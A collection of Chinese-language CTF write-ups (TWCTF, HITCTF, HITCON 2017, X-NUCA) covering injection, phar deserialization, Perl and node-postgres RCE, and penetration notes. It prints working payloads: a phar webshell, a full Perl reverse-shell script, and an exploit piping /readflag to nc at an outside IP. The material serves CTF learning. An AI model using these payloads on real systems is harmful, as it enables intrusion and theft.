首先flag是经过AES加密的,我们需要找到key去解密,而且我们得先知道key的长度(在这里很明显是16位),然后题目有一处逐位比较的地方,ord(x) ^ ord(y),通过这个地方我们能一位位构造爆破,但是问题是我们如何区别爆破成功和爆破失败?
这里涉及到python的序列化json后转换的对象问题,https://docs.python.org/3/library/json.html#encoders-and-decoders 如果遇到null就会被转换成None,遇到ord(None)的时候python就会抛出错误尝试一下这样的话我们就能够根据是否500来爆破我们需要的key了爆破脚本

import requests

se = requests.Session()

key = [None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None]
realkey = ''

for x in xrange(0,16):
    for y in xrange(32,128):
        key[x] = str(chr(y))
        test = {"key" : key}
        res = se.post('http://123.206.83.157:8000/getflag',json=test)
        # print res.content
        # exit()
        if '500' in res.content:
            print str(chr(y))
            realkey += str(chr(y))
            break
print realkey

得到key : 5ecur3pPYpyPYk3y 提交之后得到flag

参考:https://chybeta.github.io/2017/09/05/TWCTF-2017-Super-Secure-Storage-writeup/

BabyWrite

一看到这个url就想到了这个login很有可能是login.php被包含进来的, 遂直接访问login.php发现是可以的,所以直接用伪协议读取文件内容源码如下:

<!DOCTYPE html>
<html>
<head>
    <title>CTF</title>
</head>
<body>

    ç»éè§£éæ´å¤åè½
    <form action="login.php" method="POST">
        ç¨æ·å : <input name="username" placeholder="username"><br/>
        å¯ç  : <input name="password" placeholder="password"><br/><br/>
        <input type="submit" value="ç»é">
    </form>
</body>
</html>

<?php
    require_once('config.php');
    if(isset($_POST['username']) && isset($_POST['password'])){
        $username = $_POST['username'];
        $password = $_POST['password'];
        if ($username === "admin" && sha1(md5($password)) === $admin_hash){
            echo '<script>alert("Login seccess!");</script>';
        }else{
            if (isset($_GET['debug'])){
                if($_GET['debug'] === 'hitctf'){
                    $logfile = "log/".$username.".log";
                    $content = $username." => ".$password;
                    file_put_contents($logfile, $content);

                }else{
                    echo '<script>alert("Login failed!");</script>';
                }
            }else{
                echo '<script>alert("Login failed!");</script>';
            }
        }
    }else{
        echo '<script>alert("Please input username and password!");</script>';
    }
?>

从源码我们可以知道就算我们不登录也没有啥问题,提交debug参数之后可以任意写入文件内容到log后缀的文件中,这里限定死了后缀,也就是无法直接用文件包含getShell(此题包含时后缀要求是php),但是可以利用zip和phar伪协议包含,但是这里有个问题, 题目会在文件前加上 username => password ,这样的字符串有可能会破坏文件格式导致解压失败. 一叶飘零大佬是直接构造出了zip,http://skysec.top/2018/02/01/HITCTF-WEB%E9%A2%98%E8%A7%A3/ 其实用phar也可以做, 并且不用顾及格式问题,因为phar在解压的时候先寻找stub部分,也就是<?php ?>标签内的内容(会将前面的忽略),所以只要stub结构完整就ok了
构造phar

<?php
$p = new Phar('Pr0ph3t.phar', 0);
$p['shit.php'] = '<?php system($_GET[\'uuu\']); ?>';
$p->setStub('<?php __HALT_COMPILER(); ?>');
?>

写入log post username为Pr0ph3t、password为生成的phar内容到http://120.24.215.80:10012/?page=login&debug=hitctf 但是这里并不能直接用phar伪协议去包含,因为phar文件被修改过了,所以sha1签名对应不上,不会被解压所以下一步是修改文件sha1
下载被修改的log 访问http://120.24.215.80:10012/log/Pr0ph3t.log得到被修改后的phar文件其中被选中部分是这个phar的sha1签名(http://php.net/manual/en/phar.fileformat.phar.php)
计算新sha1并更改上传新phar 更改刚才的选中部分然后再次写入新phar到log
getShell
flag在根目录下

BabyQuery

一个关于GraphQL的注入 GraphQL的介绍http://graphql.cn/ 简单来说GraphQL就是一种介于数据库和客户端的一种类似于api的查询语言,客户并不直接告诉数据库需要的数据,而是GraphQL来告诉数据库客户需要什么数据,极大的避免了注入
但是这题用GraphQL的时候没有很好的过滤完全
首先getscorebyid这个操作是没问题的 id字段的内容base32encode过的,并且限制一位,无法注入
然后尝试看看有没有其他操作
有getscorebyyourname操作,猜测这个操作应该有name字段这个操作不能查询id,去掉
正常查询
尝试一下存不存在注入

Alice
  ||
IFWGSY3F (base32encode)

Alice' and 1 --+
  ||
IFWGSY3FE4QGC3TEEAYSALJNFM======

Alice' and 0 --+
  ||
IFWGSY3FE4QGC3TEEAYCALJNFM======

是存在注入的

下一步就是判断数据库类型

a' union select version() --+
  ||
METSA5LONFXW4IDTMVWGKY3UEB3GK4TTNFXW4KBJEAWS2KY=

不是mysql

a' union select sqlite_version() --+
  ||
METSA5LONFXW4IDTMVWGKY3UEBZXC3DJORSV65TFOJZWS33OFAUSALJNFM======

确认数据库为sqlite

a' union select group_concat(name) from sqlite_master where type='table' --+
  ||
METSA5LONFXW4IDTMVWGKY3UEBTXE33VOBPWG33OMNQXIKDOMFWWKKJAMZZG63JAONYWY2LUMVPW2YLTORSXEIDXNBSXEZJAOR4XAZJ5E52GCYTMMUTSALJNFM======

a' union select group_concat(sql) from sqlite_master where type='table' and name='Secr3t_fl4g'--+
  ||
METSA5LONFXW4IDTMVWGKY3UEBTXE33VOBPWG33OMNQXIKDTOFWCSIDGOJXW2IDTOFWGS5DFL5WWC43UMVZCA53IMVZGKIDUPFYGKPJHORQWE3DFE4QGC3TEEBXGC3LFHUTVGZLDOIZXIX3GNQ2GOJZNFUVQ====

getFlag

a' union select group_concat(flag) from Secr3t_fl4g --+
  ||
METSA5LONFXW4IDTMVWGKY3UEBTXE33VOBPWG33OMNQXIKDGNRQWOKJAMZZG63JAKNSWG4RTORPWM3BUM4QC2LJL

感觉自己越打越菜了….Orz………..

[hitcon2017] Baby^H-master-php-2017 复现

Fri, 26 Jan 2018 15:28:00 +0800

分享本题自制Dockerfile : Github

这题在比赛过程是0解……真的太难了…体现了Orange大大对php和中间件的深刻理解Orz 膜拜

题目源码:

<?php
$FLAG = create_function("", 'die(`/read_flag`);');
$SECRET = `/read_secret`;
$SANDBOX = "/var/www/data/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
@mkdir($SANDBOX);
@chdir($SANDBOX);

if (!isset($_COOKIE["session-data"])) {
	$data = serialize(new User($SANDBOX));
	$hmac = hash_hmac("sha1", $data, $SECRET);
	setcookie("session-data", sprintf("%s-----%s", $data, $hmac));
}

class User {
	public $avatar;
	function __construct($path) {
		$this->avatar = $path;
	}
}

#######################key class################################
class Admin extends User {
	function __destruct() {
		$random = bin2hex(openssl_random_pseudo_bytes(32));
		eval("function my_function_$random() {"
			. "  global \$FLAG; \$FLAG();"
			. "}");
		$_GET["lucky"]();
	}
}
#######################key class################################
function check_session() {
	global $SECRET;
	$data = $_COOKIE["session-data"];
	list($data, $hmac) = explode("-----", $data, 2); #从cookie中取出data和hmac签名
	if (!isset($data, $hmac) || !is_string($data) || !is_string($hmac)) #判空
	{
		die("Bye");
	}

	if (!hash_equals(hash_hmac("sha1", $data, $SECRET), $hmac)) #判断data加密之后和hmac签名是否对应
	{
		die("Bye Bye");
	}

	$data = unserialize($data); #反序列化
	if (!isset($data->avatar)) #如果反序列化之后的data包含的类中无avatar成员,退出
	{
		die("Bye Bye Bye");
	}

	return $data->avatar;
}

function upload($path) {
	$data = file_get_contents($_GET["url"] . "/avatar.gif");
	if (substr($data, 0, 6) !== "GIF89a") {
		die("Fuck off");
	}

	file_put_contents($path . "/avatar.gif", $data);
	die("Upload OK");
}

function show($path) {
	if (!file_exists($path . "/avatar.gif")) {
		$path = "/var/www/html";
	}

	header("Content-Type: image/gif");
	die(file_get_contents($path . "/avatar.gif"));
}

$mode = $_GET["m"];
if ($mode == "upload") {
	upload(check_session()); #从cookie中提取data反序列化后的avatar成员并将其内容作为路径, 请求url中的内容写到该路径下的avatar.gif文件中
} else if ($mode == "show") {
	show(check_session()); #从cookie中提取data反序列化后的avatar成员并将其内容作为路径, 展示该目录下的avatar.gif
} else {
	highlight_file(__FILE__);
}

思路:

首先分析代码, 首先分配了一个匿名函数给flag变量, 执行了这个函数就会出flag, 所以整道题的核心就是执行这个匿名函数
题目主要有两个功能, 一个是在沙盒文件夹任意写入一个gif, 一个是根据cookie中的路径查看这个gif
一开始的想法是 —–> admin是关键类,需要通过反序列化之后的析构函数去触发其中的eval —–> 通过lucky参数去调用这个输出flag的函数. 而反序列化的data是从cookie中获得, 那先尝试一下伪造cookie,但是其实cookie后半部分是用hash_hmac和一个未知的秘钥生成的一个签名, 基本上无法伪造…..所以放弃这个想法
咋一看好像代码里面并没有其他能够反序列化的地方了, 然后就来到了本题的第一个考点–php中解析Phar归档中的Metadata的时候可能会有反序列化的操作, 文档中描述的Phar::getMetadata操作(http://php.net/manual/zh/phar.getmetadata.php)
- Phar?(方便开发者打包和发布php应用的类似于Java中的Jar的一种文件)
- Phar归档的结构
- Metadata : Phar归档中可用来描述此文档的一段序列化之后的字符串
- phar_parse_metadata的初始化调用, 具体PHP源码在ext/phar/phar.c 执行流程大致为: ….–> phar_open_from_filename(1512行的php_stream_open_wrapper函数可以得知此函数处理phar://打开本地phar文件 1531行调用下一个函数) –> phar_open_from_fp(1727行调用下一个函数) –> phar_parse_pharfile(1038、1122行调用下一个函数) –> phar_parse_metadata(函数在609行)
而且题目内upload操作提供了file_get_content()函数其中地址可控,可以利用phar://协议读取本地phar文件(phar协议不支持远程文件The phar stream wrapper does not operate on remote files, and cannot operate on remote files, and so is allowed even when the allow_url_fopen and allow_url_include INI options are disabled. ),也就是说只要构造一个phar利用upload写到服务器目录, 其中metadata设置为Admin对象,就可以进入Admin的析构函数了
接下来的问题就是如何猜出那个随机数? 答案是基本上猜不出来https://security.stackexchange.com/questions/101112/can-i-rely-on-openssl-random-pseudo-bytes-being-very-random-in-php openssl_random_pseudo_bytes是加密级别的伪随机数生成器https://en.wikipedia.org/wiki/Cryptographically_secure_pseudorandom_number_generator 这是题目第二个死胡同
然后就到了题目的第二个考点, 匿名函数其实是有真正的名字从注册匿名函数的源码(Zend/zend_builtin_functions.c 1854行) 大佬还对这个逻辑戏谑了一番首先名字第一个字符被替换成了\0,也就是空字符 ,然后do操作将lambda_%d中的%d格式化成匿名函数的个数+1(从1开始) 所以最后得出的匿名函数的真正名字为:\0lambda_%d(%d格式化为当前进程的第n个匿名函数)
但是我们并不能知道当前的匿名函数到底有多少个, 因为每访问一次题目就会生成一个匿名函数; 最后就引出了最后一个考点, Apache-prefork模型(默认模型)在接受请求后会如何处理,首先Apache会默认生成5个child server去等待用户连接, 默认最高可生成256个child server, 这时候如果用户大量请求, Apache就会在处理完MaxRequestsPerChild个tcp连接后kill掉这个进程,开启一个新进程处理请求(这里猜测Orange大大应该修改了默认的0,因为0为永不kill掉子进程这样就无法kill掉旧进程fork新进程了) 在这个新进程里面匿名函数就会是从1开始的了

最后步骤分别是:

先生成符合要求的phar放入自己的vps中, 生成代码为

<?php
class Admin{
 public $avatar = 'xxx';
}
$p = new Phar(__DIR__.'/avatar.phar',0);
$p['file.php'] = '<?php ?>';
$p->setMetadata(new Admin());
$p->setStub('GIF89a<?php __HALT_COMPILER(); ?>');
rename(__DIR__.'/avatar.phar',__DIR__.'/avatar.gif');
?>

再请求?m=upload&url=http://xxx.xxx.xxx.xxx
启动Orange大大写的fork脚本

# coding: UTF-8
# Author: orange@chroot.org
# 

import requests
import socket
import time
from multiprocessing.dummy import Pool as ThreadPool
try:
    requests.packages.urllib3.disable_warnings()
except:
    pass

def run(i):
    while 1:
        HOST = '127.0.0.1'
        PORT = 12344
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))
        s.sendall('GET / HTTP/1.1\nHost: 127.0.0.1\nConnection: Keep-Alive\n\n')
        # s.close()
        print 'ok'
        time.sleep(0.5)

i = 8
pool = ThreadPool( i )
result = pool.map_async( run, range(i) ).get(0xffff)

请求?m=upload&url=phar:///var/www/data/xxx&lucky=%00lambda_1得到flag

参考: https://github.com/orangetw/My-CTF-Web-Challenges P神的小秘圈分享 http://php.net/manual/zh/book.phar.php http://blog.jobbole.com/91920/ https://yq.aliyun.com/ziliao/55320 https://www.zhihu.com/question/23786410

[hitcon2017] SSRF Me复现

Sun, 14 Jan 2018 10:04:00 +0800

分享本题自制Dockerfile：Github

题目给出了源码:

<?php 
    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); 
    @mkdir($sandbox); 
    @chdir($sandbox); 

    $data = shell_exec("GET " . escapeshellarg($_GET["url"])); 
    $info = pathinfo($_GET["filename"]); 
    $dir  = str_replace(".", "", basename($info["dirname"])); 
    @mkdir($dir); 
    @chdir($dir); 
    @file_put_contents(basename($info["basename"]), $data); 
    highlight_file(__FILE__); 

分析源码, 可以得到程序的流程是这样的:

和前面两题一样,基于ip创建沙箱文件夹
将传入的URL带入命令GET执行 — GET是Lib for WWW in Perl中的命令目的是模拟http的GET请求
解析传入的filename参数
获取传入filename的最后一级文件夹(若获取不为空)并创建 (没有实际做这道题, 但是猜测sandbox文件夹里面的php并不会被解析)

以下参考了moxiaoxi师傅和rr师傅的博客: moxiaoxi师傅:http://momomoxiaoxi.com/2017/11/08/HITCON/ rr师傅:https://ricterz.me/posts/HITCON%202017%20SSRFme

学习了大师傅们的思路之后综合,这题有两个思路

第一个是perl5的CVE-2016-1238 (截止至官方wp出来的时候Orange大佬说Ubuntu 17.04 in AWS最新版本还未被修复),当解析遇到了非定义的协议(定义的协议在perl5/LWP/Protocol文件夹下可以看到, 默认支持GHTTP、cpan、data、file、ftp、gopher、http、https、loopback、mailto、nntp、nogo协议)时, 如 pr0ph3t://pr0ph3t.com, 会自动读取当前目录下的URI目录并查看是否有对应协议的pm模块并尝试eval “require xxx” 这里我们的恶意pm模块就会被执行, 具体漏洞代码在perl5/URI.pm下的136行:

sub implementor
{
    my($scheme, $impclass) = @_;
    if (!$scheme || $scheme !~ /\A$scheme_re\z/o) {
	require URI::_generic;
	return "URI::_generic";
    }

    $scheme = lc($scheme);

    if ($impclass) {
	# Set the implementor class for a given scheme
        my $old = $implements{$scheme};
        $impclass->_init_implementor($scheme);
        $implements{$scheme} = $impclass;
        return $old;
    }

    my $ic = $implements{$scheme};
    return $ic if $ic;

    # scheme not yet known, look for internal or
    # preloaded (with 'use') implementation
    $ic = "URI::$scheme";  # default location

    # turn scheme into a valid perl identifier by a simple transformation...
    $ic =~ s/\+/_P/g;
    $ic =~ s/\./_O/g;
    $ic =~ s/\-/_/g;

    no strict 'refs';
    # check we actually have one for the scheme:
    unless (@{"${ic}::ISA"}) {
        if (not exists $require_attempted{$ic}) {
            # Try to load it
            my $_old_error = $@;
           ###################################
            eval "require $ic"; #尝试包含并执行
           ###################################
            die $@ if $@ && $@ !~ /Can\'t locate.*in \@INC/;
            $@ = $_old_error;
        }
        return undef unless @{"${ic}::ISA"};
    }

    $ic->_init_implementor($scheme);
    $implements{$scheme} = $ic;
    $ic;
}

所以找一个perl反弹shell的程序放好在自己的VPS上, 代码:

#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";

# Where to send the reverse shell. Change these.
my $ip = '127.0.0.1';
my $port = 12345;

# Options
my $daemon = 1;
my $auth   = 0; # 0 means authentication is disabled and any 
        # source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";

# Change the process name to be less conspicious
$0 = "[httpd]";

# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
    cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");

    if ($auth) {
        unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
            cgiprint("ERROR: Your client isn't authorised to view this page");
            cgiexit();
        }
    }
} elsif ($auth) {
    cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");
    cgiexit(0);
}

# Background and dissociate from parent process if required
if ($daemon) {
    my $pid = fork();
    if ($pid) {
        cgiexit(0); # parent exits
    }

    setsid();
    chdir('/');
    umask(0);
}

# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
    cgiprint("Sent reverse shell to $ip:$port");
    cgiprintpage();
} else {
    cgiprint("Couldn't open reverse shell to $ip:$port: $!");
    cgiexit();    
}

# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));

# Wrapper around print
sub cgiprint {
    my $line = shift;
    $line .= "<p>\n";
    $global_page .= $line;
}

# Wrapper around exit
sub cgiexit {
    cgiprintpage();
    exit 0; # 0 to ensure we don't give a 500 response.
}

# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
    print "Content-Length: " . length($global_page) . "\r Connection: close\r Content-Type: text\/html\r\n\r\n" . $global_page;
}

然后请求/?url=自己的vps的perl后门路径&filename=URI/pr0ph3t.pm 在沙箱文件夹的URI目录下写入反弹shell的pm文件最后监听某个端口后请求/?url=pr0ph3t://pr0ph3t.com&filename=xxx即可收到shell

第二个是perl的open命令有可能会导致命令执行
https://mailman.linuxchix.org/pipermail/courses/2003-September/001344.html

Executing Programs with “open”

In addition to what we saw last week, the “open” command has one more very powerful application: it allows you to execute a command, send input and receive output.

Try this program (it only works on Unix):
```
#!/usr/bin/perl -w
  use strict;

  open DATA, "who |"   or die "Couldn't execute program: $!";
  while ( defined( my $line = <DATA> )  ) {
    chomp($line);
    print "$line\n";
  }
  close DATA;
```
Here’s what happened: Perl saw that your “file” ended with a “pipe” (vertical bar) character. So it interpreted the “file” as a command to be executed, and interpreted the command’s output as the “file”’s contents. The command is “who” (which prints information on currently logged-in users). If you execute that command, you will see that the output is exactly what the Perl program gave you.

In this case, we “read” data from the command. To execute a command that we can “write” (send data) to, we should place a pipe character BEFORE the command. These options are mutually exclusive: we can read from a command or write to it, but not both.

In the Unix world, a lot can be done by piping the output of one program into the input of another. Perl continues this spirit.

Note that we can also send command-line parameters to the command, like this:
```
open DATA, "who -H |"    or die "Couldn't execute program: $!";
```
In fact, Perl allows you to use “open” to do pretty much anything you would normally do on the command-line, as this example demonstrates:
```
  open OUTPUT, "| grep 'foo' > result.txt"     or die "Failure: $!";
```
We can then write whatever we want to the “OUTPUT” filehandle. The Unix “grep” command will filter out any text which doesn’t contain the text “foo”; any text which DOES contain “foo” will be written to “result.txt”.

‘feature’代码在处理file协议的perl5/LWP/Protocol/file.pm的130行,如下:

...
#第47行
    # test file exists and is readable
    unless (-e $path) {
	return HTTP::Response->new( &HTTP::Status::RC_NOT_FOUND,
				  "File `$path' does not exist");
    }
    unless (-r _) {
	return HTTP::Response->new( &HTTP::Status::RC_FORBIDDEN,
				  'User does not have read permission');
    }
...
#第127行
    # read the file
    if ($method ne "HEAD") {
	open(F, $path) or return new
	    HTTP::Response(&HTTP::Status::RC_INTERNAL_SERVER_ERROR,
			   "Cannot read file '$path': $!");
	binmode(F);
	$response =  $self->collect($arg, $response, sub {
	    my $content = "";
	    my $bytes = sysread(F, $content, $size);
	    return \$content if $bytes > 0;
	    return \ "";
	});
	close(F);
    }
...

首先得满足前面的文件存在, 才会继续到open语句, 所以在执行命令前得保证有相应的同名文件, 所以先请求 /?url=file:bash -c /readflag|&filename=bash -c /readflag| 创建相应的同名文件 /?url=file:bash -c /readflag|&filename=123 利用open的feature执行代码最后直接访问/sandbox/哈希值/123就能得到flag

(安利一个文本查找工具https://blog.lilydjwg.me/tag/AG)

参考: https://github.com/orangetw/My-CTF-Web-Challenges http://momomoxiaoxi.com/2017/11/08/HITCON/ https://ricterz.me/posts/HITCON%202017%20SSRFme

[hitcon2017] Sql-so-hard 复现

Tue, 09 Jan 2018 04:09:00 +0800

最近实在是太多事情了Orz，所以没有及时更新复现。。(其实是偷懒

分享本题自制Dockerfile：Github

这道题涉及到的知识点：

mysql的max_allowed_packet
node-postgresql的一个RCE
postgresql中语句返回值的问题

本题连接了两个数据库一个是mysql–用作waf之后ip和payload记录，另外一个是postgresql–用作注册时记录用户名称和密码

因为主要是分析大大的payload为主，这里的考察点主要是node-postgresql近期的一个RCE漏洞(https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability)

这个洞详细的分析P神已经在博客贴出来了(https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html) 并且复现环境p神也已经写了Dockerfile(https://github.com/vulhub/vulhub/tree/master/node/node-postgres)

简单来说就是客户端在获取表字段的时候因为转译不完全导致原本应该拼接在代码中的字段名被构造成了恶意代码传入了Function()这个类，这个类类似于PHP中的create_function，因为函数体可控 ,也就造成了命令执行。然后官方也有转译，但是官方的转译只是把’ –> \‘ ，所以在前面加个\就能逃逸出来（逃逸后的字符串就是 \\‘）

所以这里的目的就很明确了 –> 通过postgresql的注入造成代码拼接命令执行 ß 但是会遇到两个问题：

这里postgresql存在注入但是首先得绕过一大堆关键字waf
我们的ip不能在mysql留下记录（这里的waf思路是如果有keyword则插入记录后面再查询，如果有记录则拦截）

思路：

造成Mysql插入出错提交一个很长很长的查询（默认包大小为16M），超出max_allowed_packet造成连接关闭，sql语句就不会执行官方文档：这样没有插入的话就不会查询到记录，即达到绕过waf的目的

或者使用postgreSQL支持将16进制的值转换成Unicode字符、并且可以自定义转译符的特性来将关键字全部替换掉, 从而达到绕过waf的目的, Eg: 国外大佬的wp(其中空格使用\t绕过,自定义转译符为感叹号)

','')\tON\tCONFLICT\t(username)\tDO\tUPDATE\tSET\tusername=''\tRETURNING\t1\tAS\tU&"!005c!0027+(r=process.mainModule.require,l=!0022!0022)]!002f!002f"\tUESCAPE\t'!',\t1\tAS\tU&"!005c!0027+(l+=!0022!002freadflag|nc!0020123.123!0022)]!002f!002f"\tUESCAPE\t'!',\t1\tAS\tU&"!005c!0027+(l+=!0022.123.123!00201234!0022)]!002f!002f"\tUESCAPE\t'!',\t1\tAS\tU&"!005c!0027+(r(!0022child_process!0022).execSync(l))]!002f!002f"\tUESCAPE\t'!';

构造RCE代码2017-08-12 - code execution vulnerability 目的是构造相应的字段名称造成RCE（详细原因请看P神关于漏洞的分析）这里会出现新问题：
- 不能控制insert的字段名，并且insert没有返回值(?)
- 这里利用了分号切割sql语句，不能通过;闭合sql语句的方式构造RCE

这里阅读文档, postgresql允许在insert或者update后选择一个或多个字段返回, 所以在这里就有可控字段名了, 使用格式 insert into xx(aa,bb) values('cc','dd') returning ee as ff; 最后就是构造RCE中P神在博客中提到的

单双引号都不能正常使用，我们可以使用es6中的反引号 Function环境下没有require函数, 不能获得child_process模块, 但是可以通过process.mainModule.constructor._load来代替require 一个fieldName只能有64位长度, 所以通过多个fieldName拼接来完成利用

最后是orange大大的exp:

from random import randint
import requests

# payload = "union"
payload = """','')/*%s*/returning(1)as"\\'/*",(1)as"\\'*/-(a=`child_process`)/*",(2)as"\\'*/-(b=`/readflag|nc 10.188.2.20 9999`)/*",(3)as"\\'*/-console.log(process.mainModule.require(a).exec(b))]=1//"--""" % (' '*1024*1024*16)


username = str(randint(1, 65535))+str(randint(1, 65535))+str(randint(1, 65535))
data = {
            'username': username+payload, 
                'password': 'AAAAAA'
                }
print 'ok'
r = requests.post('http://10.188.2.20:12345/reg', data=data);
print r.content

参考: https://github.com/orangetw/My-CTF-Web-Challenges https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html https://github.com/vulhub/vulhub/tree/master/node/node-postgres https://www.postgresql.org/docs/9.6/static/sql-syntax-lexical.html https://www.postgresql.org/docs/9.5/static/dml-returning.html https://github.com/sorgloomer/writeups/blob/master/writeups/2017-hitcon-quals/sql-so-hard.md https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability

[2017 X-NUCA]总决赛小结

Sun, 24 Dec 2017 07:27:00 +0800

这次X-NUCA的线下赛分成两个部分，第一个是个人赛(纯渗透) 第二个是团队赛(渗透+A&D)

个人赛

个人赛的网络拓扑图（图片有点糊

简单来说就是：选手 –> 连接VPN –> 到内网访问竞赛平台,通过竞赛平台得到跳板机(攻击机)的ip、连接端口和密码(注意这里的攻击机的意思是你要去这部机上面去攻击靶机)，主办方提供了两部攻击机，一部linux一部windows，攻击机不能访问外网

因为自己的电脑是可以访问外网的所以一直在思考能不能将题目都通过端口转发转出去公网后让小伙伴也体验一下（最终还是没有尝试。。。因为做题时间实在是太紧了。。。

主办方一共给出了6个靶机，其中有一题是pwn，题目ip和端口都要求自己扫描出来

扫出来之后发现很多都有开放22端口、80端口和3306端口，第二题还开放了21端口然后其中我做出来的是第二题，ftp尝试连接之后发现是ProFTP 1.3.5，经过主办方放hint后知道突破点在这个ftp的mod_copy模块上，搜一波cve发现是这个ProFTPd 1.3.5 - ‘mod_copy’ Remote Command Execution 其实msf也有相应的模块可以直接用直接写webshell到web默认目录(/var/www/html/)后getshell看flag

其他题目问了各位师傅后简单总结。。。。因为没看到题目可以描述有点偏差。。请各位大佬斧正Orz

第一题题目开放端口：22、80、3306 80端口是一个Joomla 扫描目录会发现有www.zip目录备份里面会有一个moadmin.php文件，这里师傅说15年百度杯的时候出过相类似的题目，moadmin.php里面有任意命令执行相关链接
第二题题目开放端口：21、22、80、3306 上述
第三题题目开放端口：22、80、10000 这题是pwn题进去80下载二进制文件不懂二进制。。。就不分析了Orz。。需要文件的大佬可以私聊一下我
第四题题目开放端口：22、80、3306 大佬说这题很奇怪。。。80端口是个joomla，然后ssh连接root@ip之后会返回一个sqli文件？？？？然后里面泄漏了一个webshell的名字，然后访问cat flag就行了
第五题题目开放端口：22 第五题主办方提示了是一个新手写的python脚本，其中开放了udp端口然后要注意的是nmap默认不扫udp端口然后扫到端口之后连接发现疑似是一个os.system(“ls “ + input) ,直接拼接命令cat flag, 如：

ls | echo | cat flag
ls && cat flag
...

第六题题目开放端口：22、80、3306 一进去是一个黑页，主办方提示和黑页作者名字有关猜想应该是进入之后getshell cat flag 貌似暂时没人做出

我觉得这次个人赛的关键是服务探测和端口转发，包括服务所在的ip、端口、banner等等获取完整，再根据服务所在的ip和端口进行转发到攻击机上，最后在自己的电脑利用工具和现有exp进行攻击后得到flag

附上端口转发常用命令： Linux

ssh -C -f -N -g -L 本地端口:靶机:欲转发端口 跳板机用户@本地IP #此命令用于转发单一端口 运行在本机上
ssh -C -f -N -g -D 本地监听端口 跳板机用户@跳板机IP #此命令用于动态端口转发 开启的是socks5

Windows

netsh interface portproxy show all #此命令查看所有端口转发
netsh interface portproxy add v4tov4 listenport=本地监听端口 listenaddress=0.0.0.0 connectport=欲转发端口 connectaddress=欲转发ip #此命令新增一个端口转发
netsh interface portproxy delete v4tov4 listenport=本地监听端口 listenaddress=0.0.0.0 #此命令删除一个端口转发

这次手慢了。。。没有来得及喝上汤。。。。。Orz膜各位大佬。。。

团队赛

这次团队赛的比赛模式之前是没有遇到过的，网络拓扑如下(第二天才给的)：

第一天下午
- 第一天下午是渗透+A&D同时进行的模式，一共有10台靶机，也就是带有用户名为info1-info10的服务器，其中有5台是攻防机，攻防机的还有用户名score1-score5 — 攻防共有两个Web，三个Pwn。我们的目标是需要找出攻防机并趁早拿下源码和开始攻击，在这过程中10台靶机的/etc/xnuca/flag.txt路径都有渗透flag，提交会得到100分，然后攻防机还会在/opt/xnuca/flag.txt路径存储A&D用的flag。
- 根据上面的规矩我们可以知道，第一天拿到Web源码的队伍晚上肯定会通宵审计找出洞之后打全场，所以第一天的源码必须要拿下。然后实际上第一天听说只有几个队伍拿下了第一个Web的源码，只有一两支队伍拿下了第二个Web的源码，pwn的源码貌似没有人拿到？然后下午饭点的时候主办方将所有pwn的程序公布了出来。。。（晚上不敢睡了。。
- 回到正题，首先我们需要扫描192.108.1.0/24得到与我们机器直连的靶机地址，然后扫描端口发现都开了445 netbios服务（本来这里是想尝试着用永恒之蓝打一下，但是主办方说这个端口是用来探测服务名称的所以使用一个命令 nmblookup - 基于TCP/IP上的NetBIOS客户用于查询NetBIOS名字的程序来探测服务名称
- 首先能扫描到4台直连的存活主机，首先第一台的web服务(info1)是一个MacCMS(苹果cms)，网上搜到这个Remote Code Execute的exp，ls查看到一个文件名叫score1_shadow_backup文件，还有一个文件名叫password_is_phone_num_13993xxxxxx，然后shadow文件里面是score1的密码，直接丢去hashcat六位数字爆破（这里我坑了。。。没有及时告诉队友phone_num是密码提示。。。导致最后面才登录上拿到源码）然后查看数据库配置文件，有注释说这是从info2迁移的，连接数据库是info2用户，得到info2的密码为call911，然后登录上info2后在home目录发现mysql history，打开后发现是创建了一个info8的用户，密码为arkteam。
- 第二台服务器的Web服务是Discuz 7.2，网上也能找到相应的exp，拿到密码之后登录，这里有点记得不太清楚了Orz。。。貌似是拿到info4的账号密码就直接ssh能登录上去了
- 然后第三台的Web服务是一个大马 Hack By NSA。。。。。。主办方提示是nopen的后门。。。但是这个到最后面都没有解出来是啥。。。
- 第四台Web服务是一个wordpress，后面getshell之后查看用户也可以知道这也是一台攻防机，因为看到了score1用户，然后这里是弱密码admin/admin登录上后台之后上传插件getshell，直接将shell打包成zip后上传，他会帮你解压到wp-content/uploads/2017/12/目录下，虽然安装出错但是还是会保留下文件。

以上是第一层直连外网的机器(192.108.1.0/24) 第二层我们想开始渗透的时候发现score1已经被师傅们打了Orz。。。所以我就没有渗透第二层太多了。。这是比较大的失误。。。我们应该继续坚持渗透，拿下web2的源码的。。。。所以就这样后面的题目就没有继续渗透下去了。。。哭。。。

我们晚上分析了一下web1的源码，主要发现了以下的几个洞：

著名的主题后门–详情这里也是大同小异看/wp-content/themes/AccountingTime/Functions.php的最后面

<?php
function _getprepare_widgets(){
	if(!isset($methods)) $methods="cookie";  //
	if(!isset($pre)) $pre="wp_";  //
	if(!isset($is_use_more)) $is_use_more=1;  // 
	if(!isset($d)) $d=$_GET["d"];  //
	if(!isset($posts_auth)) $posts_auth="auth";  //
